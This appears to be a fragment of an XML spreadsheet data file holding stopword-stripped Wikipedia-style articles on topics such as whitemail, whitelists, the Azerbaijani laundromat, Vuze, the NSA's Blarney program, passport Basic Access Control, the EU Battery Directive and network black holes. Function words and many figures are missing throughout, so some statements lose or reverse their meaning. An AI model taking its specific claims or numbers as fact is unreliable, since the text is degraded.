machine company limited [1]. john keen, harold 'doc' keen bletchley park bombe, 2003, isbn 0-947712-42-9. martin campbell-kelly, british computer industry, [2]. martin campbell-kelly. icl: business technical history. oxford university press. isbn 9780198539186. external links letchworth's enigma details bombe btmc history grace's guide british industrial history british tabulating machine paperwork collection computer museum.</t>
  </si>
  <si>
    <t>Whitemail</t>
  </si>
  <si>
    <t>whitemail, coined opposite blackmail, several meanings. economics economics, whitemail anti-takeover arrangement target company sell significantly discounted stock friendly third party. return, target company helps thwart takeover attempts, raising acquisition price raider diluting hostile bidder's number shares increasing aggregate stock holdings company social culture whitemail also considered legally compensating someone manner benefiting payer. example, person gives maître bill order secure table quickly patrons arrived earlier, could considered whitemail. merely compensatory incentive someone quicker, better, manner advantageous payer. considered bribe, depending person offered incentive action incentive intended influence. fiction terry pratchett's discworld series, whitemail anti-crime, positive committed cause outrage and/or humiliation victim. whitemail threat revealing person's good deeds purposes ruining person's reputation (e.g. gangster). other anti-crimes include breaking-and-decorating proffering-with-embarrassment. fundraising fundraising, whitemail donation received without response form, coupon, statement, source identification, cannot attributed particular fundraising campaign. these donations often come generic, white-colored envelopes. e-mail automated inbound letter handling: whitemail used refer automated handling inbound faxes letters customer requests service reception desks. example, kana whitemail uses terminology provider software integrate customer relations management (crm) systems email clients. white listed email: whitemail used term denote email sent white listed email service (e.g. icontact, constant contact, response, others). this type email usually requires mailing list approval double opt-in email recipients. this higher deliverability normal direct email lists usually used delivery newsletters regular information distributed clients subscribers. anonymous email: whitemail anonymous mailer hosted biomatic.org. would allow visitor send e-mail messages address cost registration required, simply using site's interface. whitemail even allowed users provide e-mail address (their own, somebody else's exist) would appear recipient message's origin. whitemail service removed site version 2004 references external links "whitemail". retrieved 2006-12-07.</t>
  </si>
  <si>
    <t>Whitelist</t>
  </si>
  <si>
    <t>whitelist, allowlist, passlist mechanism explicitly allows identified entities access particular privilege, service, mobility, recognition i.e. list things allowed everything denied default. opposite blacklist, list things denied everything allowed default. email whitelists spam filters often include ability "whitelist" certain sender addresses, email addresses domain names protect email rejected sent junk mail folder. these manually maintained user system administrator also refer externally maintained whitelist services. non-commercial whitelists non-commercial whitelists operated various non-profit organisations, isps, others interested blocking spam. rather paying fees, sender must pass series tests; example, email server must open relay static address. operator whitelist remove server list complaints received. commercial whitelists commercial whitelists system internet service provider allows someone bypass spam filters sending email messages subscribers, return pre-paid fee, either annual per-message fee. sender confident messages reached recipients without blocked, links images stripped them, spam filters. purpose commercial whitelists allow companies reliably reach customers email. advertising whitelists many websites rely source revenue, blockers increasingly common. websites detect adblocker often disabled site "added whitelist" standard feature adblockers. network whitelists network whitelisting occur different layers model. whitelists whitelists enforced layer model. another whitelists local area network (lan) security. many network admins address whitelists, address filter, control allowed networks. this used encryption practical solution tandem encryption. however, sometimes ineffective address faked firewall whitelists some firewalls configured allow data-traffic from/ certain (ranges ip-addresses. firewall generally works layer model. layer network layer works layer transport layer, function. application whitelists application layer layer open systems interconnection (osi) seven-layer model tcp/ip protocol suite. whitelisting commonly enforced applications level. approach combating viruses malware whitelist software considered safe run, blocking others. this particularly attractive corporate environment, typically already restrictions software approved. leading providers application whitelisting technology include bit9, velox, mcafee, lumension, airlock digital smacon microsoft windows, recent versions include applocker, allows administrators control executable files denied allowed execute. with applocker, administrators able create rules based file names, publishers file location allow certain files execute. rules apply individuals groups. policies used group users different enforcement levels. example, users added report-only policy allow administrators understand impact moving user higher enforcement level. linux systems typically apparmor linux features available used effectively block applications explicitly whitelisted, commercial products also available.on hp-ux introduced feature called "hp-ux whitelisting" 11iv3 version. controversy 2018, journal commentary report predatory publishing released making claims 'white' 'black' racially charged terms need avoided instances 'whitelist' 'blacklist'. journal became mainstream summer 2020 following george floyd protests america wherein black murdered officer, sparking protests police brutality. premise journal 'black' 'white' negative positive connotations respectively. states since 'blacklisting' first referred "the time mass enslavement forced deportation africans work european-held colonies americas," word therefore related race. there mention 'whitelist' origin relation race. this issue widely disputed computing industries 'whitelist' 'blacklist' prevalent (e.g. whitelisting). despite commentary nature journal, companies individuals others taken replacing 'whitelist' 'blacklist' alternatives 'allow list' 'deny list'.those oppose changes question attribution race, citing etymology quote 2018 journal uses. according remark, term 'blacklist' evolved term 'black book' century ago. term 'black book' appear etymology sources support racial associations, instead originating 1400s reference list people committed crimes fallen favor leaders," popularized king henry viii's literal black book. others also note prevalence positive negative connotations 'white' 'black' bible, predating attributions skin tone slavery. 1960s black power movement "black" became widespread word refer one's race person color america (alternate african-american) lending argument negative connotation behind 'black' 'blacklist' predate attribution race. also blacklisting blacklist (computing) dnswl, whitelisting based walled garden (technology), whitelist device's owner cannot control references</t>
  </si>
  <si>
    <t>Azerbaijani laundromat</t>
  </si>
  <si>
    <t>azerbaijani laundromat complex money-laundering scheme organized azerbaijan revealed organized crime corruption reporting project (occrp) september 2017. investigations exposed years 2012 2014 $2.9 billion siphoned european companies banks. money used european politicians attempt whitewash azerbaijan's reputation abroad. media investigation scheme uncovered joint investigation occrp, berlingske (denmark), guardian (uk), süddeutsche zeitung (germany), monde (france), tages-anzeiger tribune genève (switzerland), tijd (belgium), novaya gazeta (russia), dossier (austria), atlatszo (hungary), delo (slovenia), rise project (romania), bivol (bulgaria), aripaev (estonia), czech center investigative journalism (czech republic), barron's (us), published series articles revealing results investigations september 2017.internal bank documents detailing 16,000 transactions 2012 2014 initially obtained leak berlingske danish newspaper shared media partners. analysed documents revealed large number obscure transactions indirectly linked "influential persons" azerbaijan used mainly uk-based shell companies danske bank branch estonia transfer millions accounts companies individuals across world. scheme allowed azerbaijan's ruling elite funnel least $2.9 billion purportedly silence human right violations azerbaijan, promote azeri government views create positive image azerbaijan abroad.this berlingske’s first sizeable international cooperative investigation. major impact denmark danske bank's implication scheme, danish prime minister lars løkke rasmussen reacted stories publicly, telling denmark's tv2: makes angry." laundered money almost half money ($1,452,918,429) came account held international bank azerbaijan (iba) shell company linked aliyev family, $8.5 million came directly government ministries organisations modiar, ministry emergency situations, special state protection service. some money came companies ties regime like: baktelekom mmc, connected former minister goknur baki, azarbaycan metanol kompani, arash medical production offshore entities. another portion came rosoboronexport state-owned russian arms exporter. recipients also included prominent azerbaijanis government positions connections, like family yaqub eyyubov azerbaijan's first deputy prime minister, nagiyev government representative responsible battling corruption orkhan sultanov head foreign intelligence azerbaijan.the four front companies centre scheme (metastar invest, hilux services, polux management alliance) limited partnerships registered their corporate partners anonymous entities based british virgin islands, seychelles belize. danske bank handled accounts four laundromat companies, allowing billions pass estonian branch without investigation provenance funds.a majority payments went shell companies large amounts also went companies turkey accounts companies also implicated russian laundromat uncovered previously occrp, thus revealing connection money laundering schemes. both "laundromats" term coined occrp refer vast money-laundering scheme) used type british-based limited partnerships, share formation agents bank accounts, addition companies used azerbaijani scheme also appear russian version, indicating full extent scheme much larger needs investigations uncover full extent. sociopolitical implications during period money laundering activities, azerbaijani government imprisoned human rights activists, opposition politicians, journalists (such khadija ismayilova, anar mammadli, intiqam aliyev, rasul jafarov, leyla yunus) politically motivated charges. while human rights crackdown roundly condemned international human rights groups, number european politicians, among recipients laundromat payments, able mobilize important international organizations, parliamentary assembly council europe (pace) allegedly unesco, silence criticism score victories azerbaijani government.the revelations confirmed earlier reports corruption european diplomats azerbaijani officials uncovered european stability initiative 2012, since money recipients, like eduard lintner (german politician election monitor european parliament), alain destexhe (belgian politician member pace), luca volontè (italian politician member pace) others already implicated "caviar diplomacy" investigation. other recipients included: kalin mitrev (member board ebrd married irina bokova head unesco), zmago jelincic pleminiti (slovenian politician presidential candidate), karin strentz (bundestag member cdu).money shuffled also sport stars, media moguls, musicians, journalists bolster image azerbaijan. eckart sager, former journalist wrote articles friendly azerbaijani regime among recipients. reaction criminal probes azerbaijan thousands protesters took streets baku slogan "return money stolen people", demonstrate corruption fraud committed country's governing elite. bulgaria september 2017 public prosecutor's office launched inquiry kalin mitrev, bulgaria's representative ebrd, received €425,000 laundromat scheme. mitrev denied wrongdoing said payments swiss bulgarian accounts legitimate consultancy work happened joined bank's board london. september 2018, bulgarian prosecutors declared investigation audit mitrev's affairs 2012 2015 uncovered evidence evasion, money laundering, "nor discrepancy property taxpayer, expenses incurred him, income". denmark azerbaijani russian laundromat revelations became known danske bank money laundering scandal, described possibly largest money laundering scandal ever europe. immediate aftermath berlingske publications danske bank launched internal investigation estonian branch activities. september 2018 results investigation released bank thomas borgen stepped year danish prosecutors charged neglecting responsibilities. brought charges henrik ramlau-hansen, bank's former chairman financial supervisory authority, failing prevent suspicious transactions.the danish parliament introduced stringent anti-money laundering measures, increasing penalties money laundering eight-fold, making toughest europe. estonia estonian authorities launched probe matter well arrested former employees danske bank december 2018. bank required close estonian branch 2019 estonian government. council europe january 2017, following series critical reports concern expressed many members parliamentary assembly council europe (pace), assembly's bureau decided independent, external body investigate allegations corruption pace. investigation body's final report published april 2018, finding "strong suspicions corruptive conduct involving members assembly" naming number members former members breached assembly's code conduct. many members former members mentioned report sanctioned: memberes deprived certain rights members, accused accepting gifts bribes government azerbaijan, expelled assembly's premises life.in march 2019 pace committee legal affairs human rights issued report recommendations titled "laundromats: responding challenges international fight organised crime, corruption money laundering” germany july 2018, pace decided expel member german bundestag karin strenz also former politician eduard lintner buildings life. january 2019, leadership bundestag disciplined karin strenz breaking parliamentary rules declaring external income received azerbaijan. january 2020, public prosecutor's office frankfurt launched investigation karin strenz eduard lintner. bundestag waived strenz's immunity approved execution judicial searches seizure orders investigate strenz receiving money company lobbying azerbaijan owned lintner. federal criminal police searched parliamentary office apartments strenz. request german court, investigators also searched belgian politician alain destexhe's stef goris's' apartments.in march 2021, munich public prosecutor's office launched investigation initial suspicion corruption another axel fischer. bundestag lifted immunity searched representative office. hungary investigation revealed several bank transfers 2012, totalling million, made hungarian bank account budapest right around time when, amid international controversy, hungarian government extradited convicted azeri axe-murderer ramil safarov azerbaijan. several media outlets suggested connection viktor orbán’s visit baku june first instalment $7.6 million transferred bank account july, since august safarov handed azerbaijan.hungary's foreign minister péter szijjártó said hopes "international national inquiries stories uncover exactly happened, long truth known, kinds defamatory statements made everyone without consequence. firmest possible way, reject inference insinuation make inference insinuation make connection hungarian foreign policy decisions aforementioned international criminal actions." italy milan prosecutor's office charged luca volontè, former head european people's party faction pace, corruption money laundering. according prosecutor's office volontè received €2.39 million organise support azerbaijani officials council europe. january 2021, court milan sentenced luca volontè four years prison receiving bribes azerbaijani politicians. united kingdom extensive limited partnerships azerbaijani russian laundromats gave rise criticism entities regulated. result, started investigation role british lp/llp companies schemes december 2018 government unveiled raft measures money laundering british llps, increase transparency tackle corruption.in course government crackdown limited partnerships fight money laundering froze several bank accounts linked azerbaijani laundromat.khalid sharif senior partner london firm fined £45,000 £40,000 tribunal "failing carry money-laundering checks breaching professional code" real-estate deal daughters azerbaijani president, leyla arzu aliyeva, sought purchase £59.5m real estate property london.izzat khanim javad cousin azerbaijani president ilham aliyev london name mikaela jav) husband suleyman javadov agreed forfeit million funds received laundromat nca. settlement admission wrongdoing.in november, 2021 filed proceedings freeze seize million pounds bank accounts belonging wife, son, nephew javanshir feyziyev high-ranking azerbaijani politician). january 2022, seized million pounds accounts belonging ferziyev family grounds money came azerbaijani laundromat scheme. also caviar diplomacy danske bank money laundering scandal russian laundromat references external links azerbaijan buys western sympathies belsat radio free europe/radio liberty profited from 'azerbaijani laundromat'? occrp azerbaijani laundromat</t>
  </si>
  <si>
    <t>Vuze</t>
  </si>
  <si>
    <t>vuze (previously azureus) bittorrent client used transfer files bittorrent protocol. vuze written java, uses azureus engine. addition downloading data linked .torrent files, azureus allows users view, publish share original quality video content. content presented channels categories containing shows, music videos, movies, video games, series others. additionally, users prefer publish original content, earn money azureus first released june 2003 sourceforge.net, mostly experiment standard widget toolkit eclipse. later became popular bittorrent clients. azureus software released general public license, remains free software application. among popular bittorrent clients. however, vuze software added recent versions proprietary users required accept restrictive license terms. features bridging clearnet vuze client makes clearnet torrents available vice versa. plugin connects network. user adds torrent i2p, seeded clearnet, user adds torrent clearnet, seeded clearnet i2p. reason, torrents previously published made available entire internet, users download torrent internet maintaining anonymity i2p. history azureus azureus first released june 2003 sourceforge.net. blue poison dart frog (dendrobates azureus) chosen logo name brand co-creator tyler pitchford. this choice latin names poison dart frogs used codenames development projects. vuze 2006 vuze released attempt transform client "social" client group original developers forming azureus inc., shortly renamed vuze, inc. vuze-free version azureus released along vuze beta period. releases used version numbers 3.0, vuze-free versions continued release numbers. addition, developers voiced opposition idea completely transforming client. starting unknown version, vuze coupled azureus. soon after, "novuze" modified versions released pirate bay, september 2008, available versions 3.1.1.0. june 2008, developers azureus/vuze decided stop releasing versions named azureus, complete name change release version 3.1. client engine however, remains unchanged azureus. license change version 2.5.0.4, azureus distributed general public license (gpl); beginning version distribution, license presented upon installation changed. while still states "azureus application" available gpl, completing installation requires user agree terms "vuze platform," include restrictions use, reverse-engineering, sublicensing. many similar licenses, azureus licence includes prohibition software people "under 18." allegedly, applies website, vuze.com, software, however actual include application part platforms. acquisition spigot vuze acquired spigot december 2010. development hiatus pace development slowed early 2017. july 2021, latest entry development blog dated april 2017 latest code change dated february 2018. criticism vuze categorized adware softpedia, inclusion vuze toolbar browsers. vuze changes offers change home page search install promotional component necessary program function. however, adware declined using custom installation. february 2010, what.cd waffles.fm, large music sharing sites time, decided vuze.however, vuze cites softpedia editor's pick award, received editor score reviews: november 2005 another february 2012.vuze includes built-in support tor, anonymity network. onion routers volunteers using bandwidth cost. high bandwidth usage caused bittorrent protocol, considered impolite inappropriate community members network bittorrent transfers. default, exit policy blocks standard bittorrent ports.it also includes support official plugin. contrast tor, built traffic encourages use. also comparison bittorrent clients spigot references external links official website azureus vuze sourceforge vuze google play</t>
  </si>
  <si>
    <t>Blarney (code name)</t>
  </si>
  <si>
    <t>blarney communications surveillance program national security agency (nsa) united states. started 1978, operated foreign intelligence surveillance expanded september attacks.the collection takes place top-level telecommunications facilities within united states, choke points traffic flow, including wireless. this type surveillance referred upstream collection. blarney first brought public view prism slide revealed edward snowden. 2013 budget blarney $65.96 million. misrepresentations initially assumed blarney program cooperated at&amp;t among tapping facilities at&amp;t's room 641a francisco, california, revealed 2006 mark klein, another jersey. however, documents released august 2015 show cooperation at&amp;t takes places fairview, room 641a probably part program, instead blarney.the documents fairview also show larger umbrella program comprising blarney, oakstar, stormbrew others, said thomas drake. those programs similar, associated different companies, slightly different legal arrangements nsa. arrangements corporations associated nsa's special source operations division (sso). legal authorities blarney operates three legal authorities: fisa, fisa section faa. collection data fisa authority requires court order fisa court (fisc) identifiers ("selectors") target mentioned. although process acquire court order time-consuming, blarney collection fisa authority main contributor president's daily brief accounts 11,000 product reports year. workings gather intelligence, algorithms used sift communications, forward storage possible analysis, believed likely contain foreign intelligence. first stage filtering done telecoms themselves, request nsa. filters always perfect, sometimes purely domestic communications caught. event domestic communications swept minimization procedures applied. procedures require "incidental" communications u.s. persons destroyed, exceptions. exceptions include: content encrypted, contains foreign intelligence, evidence crime. this last exception allows pass drug enforcement administration's special operations division (sod) information relating drug trafficking. program likened project shamrock, nsa, predecessor organization given daily microfilm copies telegrams entering exiting united states. sigads blarney known associated sigads name. designation prism (us-984xn) similar designations blarney sigads: us-984 us-984x. accordingly, speaker's notes presentation released august 2015, "prism falls blarney, access many". note: sigads otherwise designated presumed operate legal authority section fisa amendments (faa) glossary dni: digital network intelligence. dnr: dial number recognition. transit authority: legal authority states communications transit united states collectible, provided endpoints foreign. media relating blarney also 2013 mass surveillance disclosures references</t>
  </si>
  <si>
    <t>Basic access control</t>
  </si>
  <si>
    <t>basic access control (bac) mechanism specified ensure authorized parties wirelessly read personal information passports rfid chip. uses data passport number, date birth expiration date negotiate session key. this used encrypt communication passports chip reading device. this mechanism intended ensure owner passport decide read electronic contents passport. this mechanism first introduced german passport november 2005 also used many countries (e.g., united states passports since august 2007). inner workings data used encrypt communication read electronically bottom passport called machine readable zone. because physical access passport assumed needed know part passport assumed owner passport given permission read passport. equipment optically scanning part passport already widely used. uses system read text printed standardized format. security there replay attack basic access control protocol allows individual passport traced. attack based able distinguish failed nonce check failed check works passports randomized unique identifiers hard guess keys. basic access control mechanism criticized offering little protection unauthorized interception. researchers claim limited numbers passport issued, many theoretically possible passport numbers practice. limited range human ranges reduce space possibilities. words, data used encryption entropy, meaning guessing session possible modest brute force attack. this effect increases passport numbers issued sequentially contain redundant checksum. both proven case passports issued netherlands. there factors potentially used speed brute force attack. there fact dates birth typically distributed randomly populations. dates birth distributed even less randomly segments population pass, example, check-in desk airport. fact passports often issued days week weeks year. therefore, theoretically possible expiration dates used. addition, fact real existing dates used limits number possible combinations: month makes digits used generating key. usually, digits would mean (00−99) combinations decimal code (36×36=1296) combinations alphanumeric code. months, combinations. (two digits combinations less, depending month). german passport serial-number format (previously 10-digit, all-numeric, sequentially assigned) modified november 2007, response concerns entropy session keys. 10-character serial number alphanumeric generated help specially-designed block cipher, avoid recognizable relationship expiry date increase entropy. addition, public-key based extended access control mechanism used protect information rfid chip goes beyond minimum icao requirements, particular fingerprint images. also predictable serial number attack references sources "security privacy issues e-passports" juels, david molnar, david wagner, retrieved march 2006 security review biometric passport" bart jacobs, retrieved march 2006 (presentation slides) security mechanisms biometrically enhanced (eu) passport archived 2007-09-29 wayback machine dennis kügler, federal office information security, germany (presentation slides international conference security pervasive computing 2005-04-07) external links fired obama passport breach march 2008</t>
  </si>
  <si>
    <t>Blacklisting</t>
  </si>
  <si>
    <t>blacklisting action group authority compiling blacklist black list) people, countries entities avoided distrusted deemed unacceptable making list. someone blacklist, seen government organization number people cannot trusted considered done something wrong. verb, blacklist mean individual entity list. origins term english dramatist philip massinger used phrase "black list" 1639 tragedy unnatural combat.after restoration english monarchy brought charles england throne 1660, list regicides named punished execution father. state papers charles innocent soul found black list, offended consider whether mistaken principle interest misled vote". 1676 history events leading restoration, james heath supporter charles alleged parliament passed requiring sale estates, "and black list earl derby put, unfortunate royalists".edward gibbon wrote history decline fall roman empire (1776) andronicus "his memory stored black list enemies rivals, traduced merit, opposed greatness, insulted misfortunes". employment first published reference blacklisting employee dates 1774. this became significant employment issue american mining towns company towns, blacklisting could mean complete loss livelihood workers went strike. 1901 report industrial commission stated "there doubt minds workingmen existence blacklisting system, though practically impossible obtain evidence it." cited news report 1895 former conductor atlantic pacific railroad committed suicide, work ever since strike: "wherever went, blacklist ahead him".though national labor relations 1935 outlawed punitive blacklists employees supported trade unions criticised employers, practice continued common use. taft-hartley 1947 made amendments sustained blacklisting affirming right employers anti-union, requiring trade union leaders make loyalty oaths effect hollywood blacklist. since then, lawsuits unfair dismissal blacklisting covert informal, remains common. hollywood blacklist hollywood blacklist instituted house un-american activities committee 1947 block screenwriters hollywood professionals purported communist sympathies obtaining employment. started listing entertainment industry professionals lasted 1960 effectively broken acknowledgement blacklisted professionals working assumed names many years. spanish civil communists blacklisted least volunteer (george drever) international brigades went spain fight franco's fascists also well known british communist party 1930s informed police special branch failure progress military career volunteering cause beliefs. world wars during world british government adopted "blacklist" based order council december 1915, prohibiting british subjects trade specified firms individuals neutral countries; lists published london gazette.in summer 1940, printed secret list called sonderfahndungsliste g.b. ("special search list great britain") part nazi germany's preparations invasion code-named operation lion booklet found war, commonly called black book described blacklist. medical context 1907, transvaal medical union south africa blacklisted patients could cash advance. there physical list kept community physicians. computing computing, blacklist access control system denies entry specific list defined range) users, programs, network addresses. also references further reading lorence, james (1999). suppression salt earth: hollywood, labor, politicians blacklisted movie cold america. university mexico press. isbn 0-8263-2027-9.</t>
  </si>
  <si>
    <t>Battery Directive</t>
  </si>
  <si>
    <t>directive 2006/66/ec european parliament council september 2006 batteries accumulators waste batteries accumulators repealing directive 91/157/eec, commonly known battery directive, regulates manufacture disposal batteries european union "improving environmental performance batteries accumulators".: batteries commonly contain hazardous elements mercury, cadmium, lead, incinerated landfilled, present risk environment human health. directive 91/157/eec adopted march 1991 reduce hazards harmonising member states' laws disposal recycling batteries containing dangerous substances. directive 2006/66/ec repealed directive 91/157/eec sets maximum quantities certain chemicals metals certain batteries,: tasks member states encouraging improvements environmental performance batteries,: requires proper waste management batteries, including recycling, collections, "take-back" programs, disposal,: sets waste battery collection rates,: sets financial responsibility programs,: makes rules covering phases legislation, including labelling,: marking, documentation, reviews,: 9–10 administrative procedural matters.directive 2006/66/ec amended directive 2013/56/eu november 2013, regards placing market portable batteries accumulators containing cadmium intended cordless power tools, button cells mercury content, repealing commission decision 2009/603/ec. general this directive, like many european compliance directives, directly applicable, requires legislative action european member states. though european directives legislation, european union member states must comply avoid legal action european commission bring bear don't. however member states retain freedom means implement directive's requirements. battery directive objective improving environmental performance batteries regulating certain substances manufacture batteries (lead, mercury, cadmium, etc.) setting standards waste management batteries.: many european member states passed battery waste management laws. among nations are: belgium, sweden, germany, austria, denmark, finland, united kingdom, netherlands, france, others. finland denmark supported total prohibition cadmium batteries. belgium sweden battery recycling rates respectively. with finalisation 2006 battery directive, european states specific guidelines make rules comport. history early waste directives first western european directives dealing waste management "council directive 75/442/eec july 1975 waste." mention batteries chemicals specified regulation "particular categories waste," later referenced battery directives legislative legal basis. first version european council directive batteries accumulators 91/157/eec approved march 1991. covered many battery types, including industrial, automotive, dry-cell, lead-acid, alkaline, nickel-cadmium, nickel-metal-hydride, lithium, lithium-ion, mercury, etc. first program directive six-year duration, starting 1993. provisions first directive 1991 battery directive's "article annex stated prohibition (with exceptions) marketing: batteries market september 1992 with: 1.a. mercury cell, except alkaline manganese batteries 1.b. 0.025% cadmium weight 1.c. 0.4% lead weight alkaline manganese batteries placed market september 1992 containing 0.025% mercury weight batteries market january 1999 0.0005% mercury weightsince battery recycling rates directive sought improve rates. recycling goals: separate collection recycling, provide recycling/collection information consumer. responsibility providing separated recycling collection largely given manufacturers. recycling requirements found articles there marking provisions, including manufacturer responsibility marking battery products contained substances recycling information. resistance regulation heavy resistance. disputed deadlines, target recycling rates, implementation dates, weight percentage limits, applicable product groups, financial responsibility public information campaigns waste management (and financial impact), exclusions financial responsibility given small producer businesses, personnel safety decreased reliability "greener" batteries. non-environmental battery marking question, automotive battery makers questioned markings batteries relating battery performance, arguing quantity battery's electric current output start vehicle extreme weather good indicator battery performance. after poor implementation first battery directive, work began directive would emphasise battery end-of-life waste management mandated better-structured collection recycling programs. also acknowledged research certain substance needed harsher, complete, and, arguably, unrealistic, bans. thus onus everyone waste management chain, producer consumer, rather affecting product design substance bans manufacturers claimed unreasonable. conciliation committee's compromise consultations revisions first battery directive started 1997, giving interested parties voice legislation policy, especially assessing directive's economic, environmental, social impact. february 2003 open stakeholders consultation process started, published findings online, culminated meeting brussels, july 2003. waters tested asking extended impact assessments different scenarios proposed ranges regulation. example, would impact establishing spent battery collection targets impact separate spent battery collection 100%? entities asked goals could propose collection responsibility models. "green" viewpoint (and perhaps conciliation committee's) previous directive limited scope, groups side forth reasons less stringency. those arguing broadening scope claimed batteries certain metals banned carte blanche waste management effort would hurt confusion perhaps inconvenience public. there least drafts 2003 version, equivalent second battery directive. 2003 revision, council directive 2003/0282/cod, july 2006 "conciliation agreement," compromise european council european parliament, came three years draft revisions. welcomed entities like european portable battery association (epba), favoured less stringency. models european compliance legislation, corporation organisations like epba participates working groups members include, among players, legislators, large enterprises—in case, battery-makers—trade associations, non-governmental organisations. directive's overall stated objective still protect public interest cleaner environment minimising negative impact environment batteries, especially waste cycle. depending viewpoint, also something compromise manufacturers distributors, environmental proponents. 2006 battery directive recent battery directive, entered force september 2006, gave european member states september 2008 implement national laws rules batteries (art.26 transposition). some nations took initiative already started programs passed laws accordance spirit specifications earlier battery directives. with exception button cells mercury content weight, 2006 battery directive restates earlier battery directive's prohibition marketing batteries 0.0005% mercury 0.002% cadmium weight. however, exceptions exist. directive also mandates symbols battery labels indicate battery's chemical contents lead, mercury, cadmium used. according directive, lead content batteries longer restricted. there initiatives reduce heavy metal batteries, promote using less toxic substances batteries, dispose batteries properly (not regular household waste, properly separated), research initiatives recycling. consumers informed dangers non-compliant disposal batteries. also states must easy consumers remove batteries electronic products. battery disposal disposal automotive industrial batteries leaving landfills incineration "should prohibited". (directive preamble point recycling collection batteries article requires member states maximise "separation" batteries regular municipal waste requires spent batteries collected separately. recycling collection targets called fewer batteries landfills. collection program found annex proposed member states country's standards using battery directive guide minimum levels. these levels stated terms percents prior annual sales. article 3(17) states "'collection rate' means, given member state given calendar year, percentage obtained dividing weight waste portable batteries accumulators collected accordance article 8(1) directive directive 2002/96/ec calendar year average weight portable batteries accumulators producers either sell directly end-users deliver third parties order sell end-users member state calendar year preceding calendar years." member states required provide collection sites accessible free charge public (art. battery distributors required provide member states' discretion (art. 8(2)(a)). battery manufacturers refuse take back waste batteries end-consumers, irrespective chemical composition origin (art. 8(3)). waste battery collection rate targets specified article minimum targets battery sales battery sales september 2012 2016 respectively(art. 10(2)). collections rates monitored annually outlined annex scheme, yearly reporting commission. there leeway given form "transitional agreements" nation special circumstances. (art. (4)) exclusions exemptions there many exclusions granted manufacturers certain product types. cases batteries used safety critical-use applications (e.g. miners' caps). exemptions following still place: article space, military, munitions, "essential security" applications article mercury ban: button cells less mercury content weight article cadmium ban: emergency, emergency lighting, emergency doors, alarm systems; medical equipment; cordless power tools article incinerator landfill disposal ban: residues batteries gone appropriate treatment art. 12(1) disposed landfills incineration. article possibility exclude small producers requirements financing inclusions batteries imported third countries non-discriminatory conditions included (art. 19). economic instruments member states instruments like differential rates encourage less toxic batteries recycling (art. implementation reports member states required submit implementation reports commission every three years (art. 22). labelling art. marking must indicate separate collections recycling heavy metal content. labels state collection information chemical content batteries. they show symbol "crossed-out" wheeled recycling (annex indicate battery bin. this symbol size specified percent battery area largest side (3%), except cylindrical batteries, symbol 1.5% total surface area. penalties member states measures "effective, proportionate, dissuasive" penalties actions comporting battery directive apprise european commission measures changes (art. 25). collection targets annex battery collection targets mentioned art. above: year year including date mentioned article practice practice, manufacturers batteries need make sure applied legal framework company. this means need check producer legal terms directive whether fulfilled labelling obligation. next step manufacturers distributors define battery strategy register battery compliance schemes control battery compliance monitor recycling recovery results. while working within framework battery directive manufacturers, producers distributors also aware financial aspects registration timelines ensure compliance reduce risks batteries. most time supported advice suitable qualified persons. related laws mercury-containing rechargeable battery management 1996 similar united states, banning sale mercury-containing batteries (except small button cells), requiring labelling disposal recycling. u.s. state california york city require recycling rechargeable batteries, along state maine require recycling cell phones.similar european directives protecting environment health, parallel battery directive, restriction hazardous substances (rohs), waste electrical electronic equipment (weee) registration, evaluation, authorisation restriction chemicals (reach) directives. also battery recycling list european union directives references external links summary links legislation directive european parliament council batteries accumulators waste batteries accumulators repealing directive 91/157/eec; jan. 1999 consolidated text office official publications european communities 2003/0282 (cod); june 2006</t>
  </si>
  <si>
    <t>Black hole (networking)</t>
  </si>
  <si>
    <t>networking, black hole refers place network incoming outgoing traffic silently discarded "dropped"), without informing source data reach intended recipient. when examining topology network, black holes invisible, detected monitoring lost traffic; hence name astronomical black holes cannot directly observed. dead addresses common form black hole simply address specifies host machine running address host assigned. even though tcp/ip provides means communicating delivery failure back sender icmp, traffic destined addresses often dropped. note dead address undetectable protocols connectionless unreliable (e.g., udp). connection-oriented reliable protocols (tcp, rudp) either fail connect dead address fail receive expected acknowledgements. firewalls "stealth" ports most firewalls (and routers household use) configured silently discard packets addressed forbidden hosts ports, resulting small large "black holes" network. personal firewalls respond icmp echo requests ("ping") designated vendors "stealth mode". despite this, networks addresses hosts firewalls configured easily distinguished invalid otherwise unreachable addresses: encountering latter, router generally respond icmp network rsp. host unreachable error. network address translation (nat), used home office routers, generally effective obscuring layout internal network. black hole filtering null route black hole route network route (routing table entry) goes nowhere. matching packets dropped (ignored) rather forwarded, acting kind limited firewall. using null routes often called blackhole filtering. rest article deals null routing internet protocol (ip). black hole filtering refers specifically dropping packets routing level, usually using routing protocol implement filtering several routers once, often dynamically respond quickly distributed denial-of-service attacks. remote triggered black hole filtering (rtbh) technique provides ability drop undesirable traffic enters protected network. internet exchange (ix) provider usually acquires technology help members participants filter attack null routes typically configured special route flag, also implemented forwarding packets illegal address 0.0.0.0, loopback address. null routing advantage classic firewalls since available every potential network router (including modern operating systems), adds virtually performance impact. nature high-bandwidth routers, null routing often sustain higher throughput conventional firewalls. reason, null routes often used high-performance core routers mitigate large-scale denial-of-service attacks packets reach bottleneck, thus avoiding collateral damage ddos attacks although target attack inaccessible anyone. blackhole filtering also abused malicious attackers compromised routers filter traffic destined certain address. routing typically works internet protocol layer limited packet classification. bound stateless nature routers. typically, classification limited destination address prefix, source address incoming network interface. dns-based blackhole list dns-based blackhole list (dnsbl) real-time blackhole list (rbl) list addresses published internet domain name system (dns) either zone file used server software, live zone queried real-time. dnsbls often used publish addresses computers networks linked spamming; mail server software configured reject flag messages sent site listed lists. term "blackhole list" sometimes interchanged term "blacklist" "blocklist". dnsbl software mechanism, rather specific list policy. there dozens dnsbls existence, wide array criteria listing delisting addresses. these include listing addresses zombie computers machines used send spam, listing addresses isps willingly host spammers, listing addresses sent spam honeypot system. since creation first dnsbl 1997, operation policies lists frequently controversial, internet advocacy occasionally lawsuits. many email systems operators users consider dnsbls valuable tool share information sources spam, others including prominent internet activists objected form censorship. addition, small number dnsbl operators target lawsuits filed spammers seeking lists shut altogether. pmtud black holes some firewalls incorrectly discard icmp packets, including ones needed path discovery work correctly. this causes connections from/to/through hosts lower hang. black hole e-mail addresses black hole e-mail address e-mail address valid (messages sent generate errors), received messages automatically deleted, never stored seen humans. these addresses often used return addresses automated e-mails. also bucket ddos internet background noise blocking null device packet drop attack references external links remotely triggered black hole filtering (cisco systems) university washington blackhole monitor/lookup system tools detecting blackhole attack wireless network remote triggered black hole filtering</t>
  </si>
  <si>
    <t>Battle of Midway</t>
  </si>
  <si>
